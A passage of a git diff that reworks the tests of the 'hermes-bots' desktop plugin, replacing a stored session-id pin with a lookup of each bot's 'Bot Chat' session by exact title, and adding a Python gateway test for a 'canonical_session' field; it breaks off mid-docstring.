a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-identity.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-identity.test.mjs deleted file mode 100644 index 54a9056f4d..0000000000 --- a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-identity.test.mjs +++ /dev/null @@ -1,417 +0,0 @@ -import assert from 'node:assert/strict' -import { readFileSync } from 'node:fs' -import test from 'node:test' -import vm from 'node:vm' - -const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') - -// ── canonical open-path harness (slice: createCanonicalChat + openBotCanonicalChat) -function loadOpenPath({ openSession, request }) { - const start = source.indexOf('const canonicalCreations = new Map()') - const end = source.indexOf('function displayName(', start) - const saved = [] - const requests = [] - const context = { - host: { - openSession, - request: async (method, params) => { - requests.push({ method, params }) - return request(method, params) - } - }, - saveBotMeta: (name, patch) => saved.push({ name, patch: JSON.parse(JSON.stringify(patch)) }), - $hideBotChats: { get: () => false }, - window: { setTimeout: callback => callback() } - } - const section = source - .slice(start, end) - .concat('\nglobalThis.__open = { openBotCanonicalChat };\n') - - assert.notEqual(start, -1, 'canonical creation section is missing') - assert.notEqual(end, -1, 'canonical creation section delimiter is missing') - vm.runInNewContext(section, context, { filename: 'canonical-open.js' }) - return { ...context.__open, saved, requests, host: context.host } -} - -const HISTORY = { id: 'hist-1', title: 'Bot Chat', preview: 'history preview', last_active: 1000 } - -// ── grandfather: no pin + existing history adopts the previewed session ──── - -test('grandfather: no pin + history opens and pins THAT session, no new chat', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async () => ({}) - }) - - const result = await runtime.openBotCanonicalChat('ops', null, HISTORY) - - assert.equal(result, 'hist-1') - assert.deepEqual(runtime.saved, [{ name: 'ops', patch: { chat: 'hist-1' } }]) - assert.equal(runtime.requests.some(r => r.method === 'session.create'), false, - 'must not mint a new chat when the previewed session can be adopted') -}) - -test('safety: no pin + ordinary latest history creates a Bot Chat instead of claiming it', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => - method === 'session.create' - ? { stored_session_id: 'safe-bot-chat', session_id: 'safe-bot-chat-runtime' } - : {} - }) - - const ordinary = { ...HISTORY, id: 'ordinary-1', title: '生产调度会优化' } - const result = await runtime.openBotCanonicalChat('ops', null, ordinary) - - assert.equal(result, 'safe-bot-chat') - assert.deepEqual(runtime.saved, [{ name: 'ops', patch: { chat: 'safe-bot-chat' } }]) - assert.equal(runtime.requests.some(r => r.method === 'session.create'), true) -}) - -test('grandfather: no pin + no history keeps the creation flow', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => - method === 'session.create' ? { stored_session_id: 'stored-1', session_id: 'runtime-1' } : {} - }) - - const result = await runtime.openBotCanonicalChat('ops', null, null) - - assert.equal(result, 'stored-1') - assert.equal(runtime.requests.some(r => r.method === 'session.create'), true) -}) - -test('grandfather: adoption hydration failure surfaces without forking a replacement chat', async () => { - const runtime = loadOpenPath({ - openSession: async id => { - if (id === 'hist-1') throw new Error('session vanished') - }, - request: async method => - method === 'session.create' ? { stored_session_id: 'stored-2', session_id: 'runtime-2' } : {} - }) - - await assert.rejects(runtime.openBotCanonicalChat('ops', null, HISTORY), /session vanished/) - assert.equal(runtime.saved.some(s => s.patch?.chat === 'hist-1'), false, - 'a failed adoption must not persist the dead id as the pin') - assert.equal(runtime.requests.some(r => r.method === 'session.create'), false, - 'a transient hydration failure must not fork the canonical chat') -}) - -// ── precise pin verification (no session.list pagination/hidden semantics) ─ - -test('pin: preferred_session present opens the resolved session and keeps the pin', async () => { - const opened = [] - const runtime = loadOpenPath({ - openSession: async (id, options) => { opened.push({ id, options }) }, - request: async method => { - if (method === 'profiles.list') { - return { - profiles: [{ - name: 'ops', - preferred_session: { - id: 'pin-1', resolved_id: 'pin-1', title: 'Bot Chat', - preview: 'latest', started_at: 1, last_active: 2, message_count: 3 - } - }] - } - } - return {} - } - }) - - const result = await runtime.openBotCanonicalChat('ops', 'pin-1', HISTORY) - - assert.equal(result, 'pin-1') - assert.deepEqual(JSON.parse(JSON.stringify(opened)), [{ - id: 'pin-1', - options: { - profile: 'ops', - intent: 'main', - awaitHydration: true, - expectHistory: true, - // false: clicking a bot moves the WORKSPACE onto that bot, not just the - // transcript. With true, `$activeGatewayProfile` stayed on the previously - // active profile, so "New session" from inside any bot was created on - // that other backend (measured: four new chats from different bots all - // landed in `ops`). - keepAllProfilesScope: false, - retryHydrationTimeoutOnce: true - } - }]) - assert.equal(runtime.saved.length, 0, 'a live pin must not be rewritten') - assert.equal(runtime.requests.some(r => r.method === 'session.create'), false) - // The pin is verified through the precise resolver, never session.list. - assert.equal(runtime.requests.some(r => r.method === 'session.list'), false) -}) - -test('safety: a pinned ordinary session is rejected and replaced with a Bot Chat', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => { - if (method === 'profiles.list') { - return { - profiles: [{ - name: 'ops', - preferred_session: { id: 'ordinary-3', resolved_id: 'ordinary-3', title: '生产调度会优化' } - }] - } - } - if (method === 'session.create') return { stored_session_id: 'safe-pinned-chat', session_id: 'safe-pinned-runtime' } - return {} - } - }) - - const result = await runtime.openBotCanonicalChat('ops', 'ordinary-3', HISTORY) - - assert.equal(result, 'safe-pinned-chat') - assert.deepEqual(runtime.saved, [ - { name: 'ops', patch: { chat: null } }, - { name: 'ops', patch: { chat: 'safe-pinned-chat' } } - ]) -}) - -test('pin: compression-rotated pin opens the live tip, keeps the durable pin', async () => { - const opened = [] - const runtime = loadOpenPath({ - openSession: async id => { opened.push(id) }, - request: async method => { - if (method === 'profiles.list') { - return { - profiles: [{ - name: 'ops', - preferred_session: { - id: 'root-1', resolved_id: 'tip-9', root_title: 'Bot Chat', title: 'Bot Chat (continued)', - preview: 'post-compression', started_at: 1, last_active: 9, message_count: 42 - } - }] - } - } - return {} - } - }) - - const result = await runtime.openBotCanonicalChat('ops', 'root-1', HISTORY) - - assert.deepEqual(opened, ['tip-9']) - assert.equal(result, 'root-1', 'the stored pin keeps its durable identity') - assert.equal(runtime.saved.length, 0) -}) - -test('pin: definitively gone pin re-pins to the previewed session, not rows[0]', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => { - if (method === 'profiles.list') { - return { profiles: [{ name: 'ops', preferred_session: null }] } - } - return {} - } - }) - - const result = await runtime.openBotCanonicalChat('ops', 'dead-pin', HISTORY) - - assert.equal(result, 'hist-1') - assert.deepEqual(runtime.saved, [{ name: 'ops', patch: { chat: 'hist-1' } }]) - assert.equal(runtime.requests.some(r => r.method === 'session.create'), false) -}) - -test('safety: a dead pin does not re-anchor on an ordinary latest session', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => { - if (method === 'profiles.list') return { profiles: [{ name: 'ops', preferred_session: null }] } - if (method === 'session.create') return { stored_session_id: 'safe-replacement', session_id: 'safe-replacement-runtime' } - return {} - } - }) - - const ordinary = { ...HISTORY, id: 'ordinary-2', title: '生产调度会优化' } - const result = await runtime.openBotCanonicalChat('ops', 'dead-pin', ordinary) - - assert.equal(result, 'safe-replacement') - assert.deepEqual(runtime.saved, [ - { name: 'ops', patch: { chat: null } }, - { name: 'ops', patch: { chat: 'safe-replacement' } } - ]) - assert.equal(runtime.requests.some(r => r.method === 'session.create'), true) -}) - -test('pin: gone pin + no history clears the pin and creates', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => { - if (method === 'profiles.list') { - return { profiles: [{ name: 'ops', preferred_session: null }] } - } - if (method === 'session.create') return { stored_session_id: 'stored-3', session_id: 'runtime-3' } - return {} - } - }) - - const result = await runtime.openBotCanonicalChat('ops', 'dead-pin', null) - - assert.equal(result, 'stored-3') - // Pin cleared first (dead pin is provably unusable), then the freshly - // created chat pins itself inside createCanonicalChat. - assert.deepEqual(runtime.saved, [ - { name: 'ops', patch: { chat: null } }, - { name: 'ops', patch: { chat: 'stored-3' } } - ]) -}) - -test('pin: precise hit but failed hydration keeps the pin and surfaces the failure', async () => { - const runtime = loadOpenPath({ - openSession: async () => { throw new Error('socket hiccup') }, - request: async method => { - if (method === 'profiles.list') { - return { - profiles: [{ - name: 'ops', - preferred_session: { - id: 'pin-1', resolved_id: 'pin-1', title: 'Bot Chat', - preview: 'latest', started_at: 1, last_active: 2, message_count: 3 - } - }] - } - } - return {} - } - }) - - await assert.rejects(runtime.openBotCanonicalChat('ops', 'pin-1', HISTORY), /socket hiccup/) - assert.equal(runtime.saved.length, 0, 'a confirmed-live pin must survive a transient open failure') - assert.equal(runtime.requests.some(r => r.method === 'session.create'), false, - 'must not fork the forever-chat on a hiccup') -}) - -test('pin: a waking-backend hydration timeout asks the SDK to retry internally', async () => { - // The internal retry-and-succeed behavior lives in host.openSession itself - // (apps/desktop/src/sdk/index.ts) now, because only that layer sees the - // $resumeExhaustedSessionId latch that the core stranded-session overlay - // reads — a plugin-side retry can silently resolve while that overlay stays - // latched (hermes-agent#89617). This harness stubs host.openSession with a - // bare mock, so it can only prove the plugin ASKS for the retry, not that - // the overlay never appears; see profile-routing.test.ts for that. - const opts = [] - const runtime = loadOpenPath({ - openSession: async (id, options) => { opts.push(options) }, - request: async method => { - if (method === 'profiles.list') { - return { - profiles: [{ - name: 'ops', - preferred_session: { - id: 'pin-1', resolved_id: 'pin-1', title: 'Bot Chat', - preview: 'latest', started_at: 1, last_active: 2, message_count: 3 - } - }] - } - } - return {} - } - }) - - const result = await runtime.openBotCanonicalChat('ops', 'pin-1', HISTORY) - - assert.equal(result, 'pin-1') - assert.equal(opts.length, 1) - assert.equal(opts[0].retryHydrationTimeoutOnce, true, 'the SDK must own the hydration-timeout retry') -}) - -test('pin: a persistent hydration timeout still surfaces the failure', async () => { - const runtime = loadOpenPath({ - openSession: async () => { throw new Error("Timed out loading ops's session history.") }, - request: async method => { - if (method === 'profiles.list') { - return { - profiles: [{ - name: 'ops', - preferred_session: { - id: 'pin-1', resolved_id: 'pin-1', title: 'Bot Chat', - preview: 'latest', started_at: 1, last_active: 2, message_count: 3 - } - }] - } - } - return {} - } - }) - - await assert.rejects(runtime.openBotCanonicalChat('ops', 'pin-1', HISTORY), /Timed out loading/) - assert.equal(runtime.saved.length, 0, 'a confirmed-live pin must survive a persistent hydration timeout') -}) - -// ── transient failures must never destroy the pin ────────────────────────── - -test('transient: profiles.list failure keeps the pin when the direct open works', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => { - if (method === 'profiles.list') throw new Error('gateway reconnecting') - return {} - } - }) - - const result = await runtime.openBotCanonicalChat('ops', 'pin-1', HISTORY) - - assert.equal(result, 'pin-1') - assert.equal(runtime.saved.length, 0, 'a hiccup must not clear or rewrite the pin') - assert.equal(runtime.requests.some(r => r.method === 'session.create'), false, - 'a hiccup must not mint a replacement chat') -}) - -test('transient: profiles.list failure + failed direct open preserves pin and surfaces Retry', async () => { - const runtime = loadOpenPath({ - openSession: async id => { - if (id === 'pin-1') throw new Error('resume rejected') - }, - request: async method => { - if (method === 'profiles.list') throw new Error('gateway reconnecting') - if (method === 'session.create') return { stored_session_id: 'stored-4', session_id: 'runtime-4' } - return {} - } - }) - - await assert.rejects(runtime.openBotCanonicalChat('ops', 'pin-1', HISTORY), /resume rejected/) - assert.deepEqual(runtime.saved, [], 'an inconclusive outage must never clear the canonical pin') - assert.equal(runtime.requests.some(r => r.method === 'session.create'), false, - 'an inconclusive outage must never fork the canonical chat') -}) - -// ── preferred_session_ids request shaping (pure helper) ──────────────────── - -function loadHelpers() { - const atom = value => ({ get: () => value, set: () => undefined }) - const jsx = (type, props = {}) => ({ type, props }) - const context = { - atom, - jsx, - jsxs: jsx, - useQuery: () => ({}), - useValue: value => (value?.get ? value.get() : value), - useState: value => [value, () => undefined], - document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } }, - host: { state: { profile: { get: () => 'ops', listen: () => undefined } }, request: () => undefined } - } - const code = source - .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '') - .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '') - .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '') - .replace(/^import .* from 'react'\r?\n/m, '') - .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '') - .replace('export default {', 'globalThis.plugin = {') - .concat('\nglobalThis.__preferredSessionIds = preferredSessionIds;') - vm.runInNewContext(code, context) - return context -} - -test('preferredSessionIds: collects only live pins', () => { - // vm-realm objects fail assert.deepEqual prototype checks — compare via JSON. - const collect = meta => JSON.parse(JSON.stringify(loadHelpers().__preferredSessionIds(meta))) - assert.deepEqual( - collect({ ops: { chat: 'pin-1' }, scribe: { chat: null }, chef: { title: 'Chef' } }), - { ops: 'pin-1' } - ) - assert.deepEqual(collect({}), {}) - assert.deepEqual(collect(undefined), {}) -}) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-pin.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-pin.test.mjs deleted file mode 100644 index 630ddf1a73..0000000000 --- a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-pin.test.mjs +++ /dev/null @@ -1,86 +0,0 @@ -import assert from 'node:assert/strict' -import { readFileSync } from 'node:fs' -import test from 'node:test' -import vm from 'node:vm' - -// #24's guarantee — a VALID canonical pin is opened as-is, never replaced, -// and only an ACTUALLY-missing pin triggers recovery — used to be pinned -// against the old implementation's source shape (session.list rows[0] -// fallback). hermes-agent#88200 replaced that windowed, hidden-excluding -// lookup with the backend's precise preferred_session resolver, so the -// guarantee is now pinned as BEHAVIOR: what gets opened, what gets saved, -// and what never happens to a live pin. - -const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') - -function loadOpenPath({ openSession, request }) { - const start = source.indexOf('const canonicalCreations = new Map()') - const end = source.indexOf('function displayName(', start) - const saved = [] - const requests = [] - const context = { - host: { - openSession, - request: async (method, params) => { - requests.push({ method, params }) - return request(method, params) - } - }, - saveBotMeta: (name, patch) => saved.push({ name, patch: JSON.parse(JSON.stringify(patch)) }), - $hideBotChats: { get: () => false }, - window: { setTimeout: callback => callback() } - } - const section = source - .slice(start, end) - .concat('\nglobalThis.__open = { openBotCanonicalChat };\n') - - assert.notEqual(start, -1, 'canonical chat section is missing') - assert.notEqual(end, -1, 'canonical chat section delimiter is missing') - vm.runInNewContext(section, context, { filename: 'canonical-pin.js' }) - return { ...context.__open, saved, requests } -} - -test('regression: a live pinned canonical chat is opened as-is, never replaced', async () => { - const opened = [] - const runtime = loadOpenPath({ - openSession: async id => opened.push(id), - request: async method => { - if (method === 'profiles.list') { - return { - profiles: [{ - name: 'ops', - preferred_session: { - id: 'pin-1', resolved_id: 'pin-1', title: 'Bot Chat', - preview: 'latest', started_at: 1, last_active: 2, message_count: 3 - } - }] - } - } - return {} - } - }) - - assert.equal(await runtime.openBotCanonicalChat('ops', 'pin-1', null), 'pin-1') - assert.deepEqual(opened, ['pin-1'], 'the pin itself is opened under the bot profile') - assert.deepEqual(runtime.saved, [], 'a live pin is never rewritten') - assert.equal(runtime.requests.some(r => r.method === 'session.create'), false, - 'a live pin never triggers a replacement chat') -}) - -test('regression: only an actually-missing pin triggers recovery', async () => { - const runtime = loadOpenPath({ - openSession: async () => undefined, - request: async method => { - if (method === 'profiles.list') { - return { profiles: [{ name: 'ops', preferred_session: null }] } - } - return {} - } - }) - - // Definitively gone, but the roster still previews a live session — - // recovery re-anchors on THAT session instead of minting a new chat. - const history = { id: 'hist-1', title: 'Bot Chat', preview: 'p', last_active: 1 } - assert.equal(await runtime.openBotCanonicalChat('ops', 'dead-pin', history), 'hist-1') - assert.deepEqual(runtime.saved, [{ name: 'ops', patch: { chat: 'hist-1' } }]) -}) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-registry.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-registry.test.mjs new file mode 100644 index 0000000000..4901439cc2 --- /dev/null +++ b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-registry.test.mjs @@ -0,0 +1,177 @@ +import assert from 'node:assert/strict' +import { readFileSync } from 'node:fs' +import test from 'node:test' +import vm from 'node:vm' + +// ── The canonical-chat REGISTRY contract ──────────────────────────────────── +// +// A bot's forever-chat has exactly ONE identity: the session titled "Bot Chat" +// on that bot's profile. The core UNIQUE(title) index makes (profile, +// "Bot Chat") an exact registry — at most one row, resolved fresh on every +// open via `session.list { title: 'Bot Chat', include_hidden: true }`. +// +// There is NO session-id pin. The previous design stored a pointer in +// ui_meta['hermes-bots'].chat and spent five hardening waves (#88690, #90732, +// #90751, #91791-revert, #92042) guarding its failure modes: rows[0] steals, +// last_session adoptions, transient clears, drifted-title welds. Every "lost +// canonical chat" incident traced to that pointer dangling and a later guard +// then welding the wrong session in. Name-as-identity removes the failure +// class instead of guarding it: a name cannot dangle. +// +// This suite pins the whole contract: +// 1. open = registry lookup → open the row (lineage tip) +// 2. no row → create (adopt-before-mint lives inside creation) +// 3. no pointer is ever read or written on the open path + +const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') + +function loadOpenPath({ openSession, request }) { + const start = source.indexOf('const canonicalCreations = new Map()') + const end = source.indexOf('function displayName(', start) + const requests = [] + const opened = [] + const context = { + host: { + openSession: async (id, options) => { + opened.push({ id, options }) + return openSession ? openSession(id, options) : undefined + }, + request: async (method, params) => { + requests.push({ method, params: JSON.parse(JSON.stringify(params ?? null)) }) + return request(method, params) + } + }, + window: { setTimeout: callback => callback() } + } + const section = source + .slice(start, end) + .concat('\nglobalThis.__open = { createCanonicalChat, openBotCanonicalChat, findExistingCanonicalChat };\n') + + assert.notEqual(start, -1, 'canonical section is missing') + assert.notEqual(end, -1, 'canonical section delimiter is missing') + vm.runInNewContext(section, context, { filename: 'canonical-registry.js' }) + return { ...context.__open, requests, opened } +} + +// ── 1. the registry row wins, always ──────────────────────────────────────── + +test('open resolves the profile\u2019s "Bot Chat" row by exact title and opens it', async () => { + const runtime = loadOpenPath({ + request: async method => { + if (method === 'session.list') { + return { sessions: [{ id: 'forever-chat', title: 'Bot Chat', message_count: 930 }] } + } + if (method === 'session.create') { + throw new Error('must not create: the registry row exists') + } + return {} + } + }) + + assert.equal(await runtime.openBotCanonicalChat('ops'), 'forever-chat') + assert.equal(runtime.opened.length, 1) + assert.equal(runtime.opened[0].id, 'forever-chat') + assert.equal(runtime.opened[0].options.profile, 'ops') + assert.equal(runtime.opened[0].options.keepAllProfilesScope, false, + 'opening a bot moves the workspace onto that bot') + + const list = runtime.requests.find(r => r.method === 'session.list') + assert.equal(list?.params?.title, 'Bot Chat', 'lookup is by exact title') + assert.equal(list?.params?.profile, 'ops') + assert.equal(list?.params?.include_hidden, true, + 'canonical chats are always hidden — the lookup must see hidden rows') +}) + +test('a compression-rotated registry row opens the lineage tip', async () => { + const runtime = loadOpenPath({ + request: async method => { + if (method === 'session.list') { + return { + sessions: [{ id: 'root-1', resolved_id: 'tip-9', root_title: 'Bot Chat', title: 'Bot Chat', message_count: 400 }] + } + } + return {} + } + }) + + assert.equal(await runtime.openBotCanonicalChat('ops'), 'root-1', + 'the durable registry id is returned') + assert.equal(runtime.opened[0].id, 'tip-9', 'the live tip is what opens') +}) + +test('the open path never reads or writes a stored pointer', () => { + const start = source.indexOf('const canonicalCreations = new Map()') + const end = source.indexOf('function displayName(', start) + const section = source.slice(start, end) + + assert.doesNotMatch(section, /saveBotMeta/, 'no pointer writes on the canonical path') + assert.doesNotMatch(section, /meta\??\.chat\b/, 'no pointer reads on the canonical path') + assert.doesNotMatch(section, /preferred_session_ids/, 'no id-verification RPC on the canonical path') +}) + +test('openBotCanonicalChat takes only the bot name — identity needs nothing else', () => { + assert.match(source, /async function openBotCanonicalChat\(name\) \{/) +}) + +// ── 2. no registry row → create ───────────────────────────────────────────── + +test('no registry row mints a hidden "Bot Chat" session with the intro kickoff', async () => { + const runtime = loadOpenPath({ + request: async method => { + if (method === 'session.list') return { sessions: [] } + if (method === 'session.create') return { stored_session_id: 'fresh-1', session_id: 'rt-1' } + return {} + } + }) + + assert.equal(await runtime.openBotCanonicalChat('newbie'), 'fresh-1') + const create = runtime.requests.find(r => r.method === 'session.create') + assert.equal(create?.params?.title, 'Bot Chat') + assert.equal(create?.params?.hidden, true) + const kickoff = runtime.requests.find(r => r.method === 'prompt.submit') + assert.equal(kickoff?.params?.session_id, 'rt-1') +}) + +test('a failed open of the registry row surfaces instead of forking a replacement', async () => { + const runtime = loadOpenPath({ + openSession: async () => { + throw new Error('backend restarting') + }, + request: async method => { + if (method === 'session.list') { + return { sessions: [{ id: 'forever-chat', title: 'Bot Chat', message_count: 12 }] } + } + if (method === 'session.create') { + throw new Error('must not create: a transient open failure is not ownership loss') + } + return {} + } + }) + + await assert.rejects(() => runtime.openBotCanonicalChat('ops'), /backend restarting/) +}) + +// ── 3. ordinary sessions are never claimed ────────────────────────────────── + +test('an ordinary titled session never satisfies the registry lookup', async () => { + const runtime = loadOpenPath({ + request: async method => { + if (method === 'session.list') { + // A misbehaving/older gateway ignores the title param and returns a + // windowed listing — the local exact-title scan still applies. + return { + sessions: [ + { id: 'scratch', title: 'help me with x', message_count: 40 }, + { id: 'draft', title: '', message_count: 0 } + ] + } + } + if (method === 'session.create') return { stored_session_id: 'fresh-2', session_id: 'rt-2' } + return {} + } + }) + + assert.equal(await runtime.openBotCanonicalChat('ops'), 'fresh-2', + 'no row titled "Bot Chat" → create; never adopt an ordinary conversation') + assert.ok(!runtime.opened.some(o => o.id === 'scratch')) +}) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/hide-bot-chats.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/hide-bot-chats.test.mjs index 0fc0f261cc..7a7df457e7 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/hide-bot-chats.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/hide-bot-chats.test.mjs @@ -51,7 +51,7 @@ test('group member session.create is unconditionally hidden too', () => { assert.equal(source.includes('$hideBotChats'), false, 'the old pref atom must be gone') }) -test('hideOwnedBotSessions sweeps canonical chats AND room member sessions', async () => { +test('hideOwnedBotSessions sweeps room member sessions by id', async () => { const start = source.indexOf('function hideOwnedBotSessions()') const end = source.indexOf('/** Fetch server-side avatars', start) const calls = [] @@ -59,60 +59,37 @@ test('hideOwnedBotSessions sweeps canonical chats AND room member sessions', asy host: { request: async (method, params) => { calls.push({ method, params }) - if (method === 'profiles.list') { - return { - profiles: [ - { name: 'alpha', preferred_session: { id: 'chat-a', title: 'Bot Chat' } }, - { name: 'beta', preferred_session: { id: 'chat-b', title: 'Bot Chat' } } - ] - } - } return {} } }, - $botMeta: { get: () => ({ alpha: { chat: 'chat-a' }, beta: { chat: 'chat-b' }, gamma: {} }) }, $groupChats: { get: () => ({ Core: { sessions: { alpha: 'room-core-a', beta: 'room-core-b' } }, - Quiet: { sessions: { alpha: 'chat-a' } }, // duplicate id — must dedupe + Quiet: { sessions: { alpha: 'room-core-a' } }, // duplicate id — must dedupe Legacy: {} // pre-sessions room shape }) - } + }, + sweepBotProfileSessions: async () => undefined } const section = source.slice(start, end).concat('\nglobalThis.__h = { hideOwnedBotSessions };\n') vm.runInNewContext(section, context, { filename: 'h.js' }) await context.__h.hideOwnedBotSessions() const ids = calls.filter(c => c.method === 'session.set_hidden').map(c => c.params.session_id).sort() - assert.deepEqual(ids, ['chat-a', 'chat-b', 'room-core-a', 'room-core-b']) + assert.deepEqual(ids, ['room-core-a', 'room-core-b']) const hiddenCalls = calls.filter(c => c.method === 'session.set_hidden') assert.ok(hiddenCalls.every(c => c.params.hidden === true)) }) -test('safety: a stale canonical pointer to an ordinary session is not hidden', async () => { +test('hideOwnedBotSessions never consults stored canonical pointers', () => { + // Canonical Bot Chats are hidden by the TITLE sweep (they are identified by + // name, not by pointer) — the load-time reconciliation must not read + // $botMeta chat ids or verify them via profiles.list. const start = source.indexOf('function hideOwnedBotSessions()') - const end = source.indexOf('/** Fetch server-side avatars', start) - const calls = [] - const context = { - host: { - request: async (method, params) => { - calls.push({ method, params }) - if (method === 'profiles.list') { - return { - profiles: [{ name: 'default', preferred_session: { id: 'ordinary-1', title: '生产调度会优化' } }] - } - } - return {} - } - }, - $botMeta: { get: () => ({ default: { chat: 'ordinary-1' } }) }, - $groupChats: { get: () => ({}) } - } - const section = source.slice(start, end).concat('\nglobalThis.__h = { hideOwnedBotSessions };\n') - vm.runInNewContext(section, context, { filename: 'h-stale.js' }) - await context.__h.hideOwnedBotSessions() - - assert.equal(calls.some(c => c.method === 'session.set_hidden'), false) + const end = source.indexOf('// Titles Bot Mode itself mints', start) + const section = source.slice(start, end) + assert.doesNotMatch(section, /botMeta/) + assert.doesNotMatch(section, /profiles\.list/) }) test('sweepBotProfileSessions hides Bot-Mode-titled rows per roster bot, and only those', async () => { @@ -177,9 +154,8 @@ test('hideOwnedBotSessions chains the ownership sweep and survives its absence o test('the canonical-chat adoption scan lists with include_hidden', () => { // The one session.list consumer that must see the always-hidden rows: - // findExistingCanonicalChat (adopt-before-mint) — canonical Bot Chats are - // born hidden, so a visible-only scan would miss the very row whose - // existence forbids minting. (Pin recovery goes through profiles.list - // preferred_session_ids, whose resolver already sees hidden rows.) + // findExistingCanonicalChat (the registry lookup) — canonical Bot Chats + // are born hidden, so a visible-only scan would miss the very row that IS + // the bot's identity. assert.match(source, /include_hidden: true\s*\}\)\s*const rows = res\?\.sessions \?\? \[\]\s*return rows\.find\(row => isCanonicalBotChatHistory\(row\)\)/) }) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/new-compact-guard.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/new-compact-guard.test.mjs index b729520095..d6a18bee1c 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/new-compact-guard.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/new-compact-guard.test.mjs @@ -3,25 +3,26 @@ import { readFileSync } from 'node:fs' import test from 'node:test' // The /new -> /compact guard protects a bot's canonical forever-chat from being -// forked by /new. It compares the current session id against the bot's stored -// canonical id. That id is persisted as meta.chat everywhere (createCanonicalChat -// saveBotMeta(name,{chat:sid}), openBotCanonicalChat, BotRow). A regression read -// it as meta.chat_pin — a key that is never written — so pinnedId was always null -// and the guard never fired: /new silently forked the forever-chat. +// forked by /new. Canonical identity is the NAME — the profile's session titled +// "Bot Chat" — reported by the gateway as canonical_session on every roster row. +// The guard compares the on-screen session id against that registry row (durable +// id OR compression-lineage tip). No stored meta.chat pointer is consulted: +// pointers dangle; the registry row cannot. const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') // Locate the /new reroute guard block. const guardStart = source.indexOf('const slashNew =') assert.notEqual(guardStart, -1, '/new guard block is missing') -const guardBlock = source.slice(guardStart, guardStart + 600) +const guardBlock = source.slice(guardStart, guardStart + 900) -test('regression: /new guard reads the canonical id from meta.chat, not meta.chat_pin', () => { - assert.match(guardBlock, /const pinnedId = meta\?\.chat \|\| null/) +test('the /new guard reads the canonical registry row, never a stored pointer', () => { + assert.match(guardBlock, /canonical_session/) + assert.doesNotMatch(guardBlock, /meta\?\.chat/) assert.doesNotMatch(guardBlock, /chat_pin/) }) -test('regression: canonical id is persisted as meta.chat (the key the guard reads)', () => { - // The writer and the guard must agree on the key, or the guard never fires. - assert.match(source, /saveBotMeta\([^)]*\{\s*chat:\s*sid\s*\}/) +test('the guard matches both the durable registry id and the lineage tip', () => { + assert.match(guardBlock, /canonical\?\.id/) + assert.match(guardBlock, /canonical\?\.resolved_id/) }) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/roster-preview.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/roster-preview.test.mjs index 0962f2d895..fba9ed2f74 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/roster-preview.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/roster-preview.test.mjs @@ -237,7 +237,7 @@ test('render: BotRow previews the pinned canonical chat, not an unrelated latest title: 'Ops', description: '', last_session: { id: 'scratch9', title: 'Scratch', preview: 'unrelated scratch content', last_active: 1_800_000_000 }, - preferred_session: { id: 'pinned1', resolved_id: 'pinned1', title: 'Bot Chat', preview: 'pinned chat content', started_at: 1, last_active: 1_700_000_000, message_count: 5 } + canonical_session: { id: 'pinned1', resolved_id: 'pinned1', title: 'Bot Chat', preview: 'pinned chat content', started_at: 1, last_active: 1_700_000_000, message_count: 5 } }, onEdit: () => undefined }) diff --git a/tests/tui_gateway/test_profiles_list_canonical_session.py b/tests/tui_gateway/test_profiles_list_canonical_session.py new file mode 100644 index 0000000000..a2c2356ccc --- /dev/null +++ b/tests/tui_gateway/test_profiles_list_canonical_session.py @@ -0,0 +1,189 @@ +"""Tests: profiles.list ``canonical_session`` registry summaries. + +Why: a bot's canonical forever-chat has exactly ONE identity — the session +titled "Bot Chat" on that bot's profile (core UNIQUE(title) makes it a +registry of at most one row). The desktop BOTS roster previews it and clicks +open it, so the gateway resolves the registry row server-side on every +``profiles.list`` and reports it per profile as ``canonical_session``. No +client ever passes a session pointer: the previous ``preferred_session_ids`` +pin-verification contract is REMOVED (pointers dangle; names cannot). + +Contract under test: +- Every profile row (with include_sessions on) carries ``canonical_session``: + a summary dict when a "Bot Chat" row exists, ``None`` when it does not + (no row, denied internal source, archived). +- Summary keys: ``id`` (the durable registry row), ``resolved_id`` (live + compression tip; equal to ``id`` when uncompressed), ``root_title``, + ``title``, ``preview`` (newest user/assistant text at the tip), + ``started_at``, ``last_active``, ``message_count``. +- Hidden rows resolve (canonical chats are always hidden). +- ``last_session`` behaviour is unchanged in every case. +- ``include_sessions: false`` 